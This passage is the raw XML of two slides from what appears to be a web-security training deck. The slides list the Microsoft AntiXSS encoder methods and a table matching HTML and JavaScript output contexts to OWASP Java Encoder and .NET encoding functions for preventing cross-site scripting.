                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8153" y="1977"/>
                    <a:pt x="8355" y="1258"/>
                    <a:pt x="7995" y="719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7614" y="180"/>
                    <a:pt x="6827" y="0"/>
                    <a:pt x="6221" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="2740"/>
                    <a:pt x="0" y="3436"/>
                    <a:pt x="360" y="3976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="4515"/>
                    <a:pt x="1527" y="4694"/>
                    <a:pt x="2134" y="4357"/>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3259397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Microsoft Encoder and AntiXSS Library</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1835547"/>
            <a:ext cx="8686800" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="457200" bIns="9144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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft.Security.Application.Encoder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2497738"/>
            <a:ext cx="8686800" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="457200" bIns="9144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accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>For use in your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>User Interface Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>to defuse script in output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3159929"/>
            <a:ext cx="8686800" cy="2736647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="457200" bIns="9144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00"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HtmlAttributeEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>UrlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XmlAttributeEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScriptEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CSSEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>VisualBasicScriptEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(string input)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495558" y="457200"/>
            <a:ext cx="1191241" cy="1134269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4016853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XSS Defense by Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>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1563652971"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1471766"/>
          <a:ext cx="8229600" cy="4591602"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1321496">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1284245">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2943412">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2680447">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="530352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400"/>
                        <a:t>Context</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400"/>
                        <a:t>Encoding</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400"/>
                        <a:t>OWASP Java Encoder</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400"/>
                        <a:t>.NET </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" err="1"/>
                        <a:t>AntiXSS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="768096">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HTML</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Body</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296"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HTML Entity Encode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forHtmlContent</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encoder.HtmlEncode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="768096">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HTML Attribute</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HTML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Entitly</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forHtmlAttribute</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encoder.HtmlAttributeEncode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="988866">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>JavaScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>JavaScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Hex Encode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forJavaScript</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forJavaScriptBlock</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
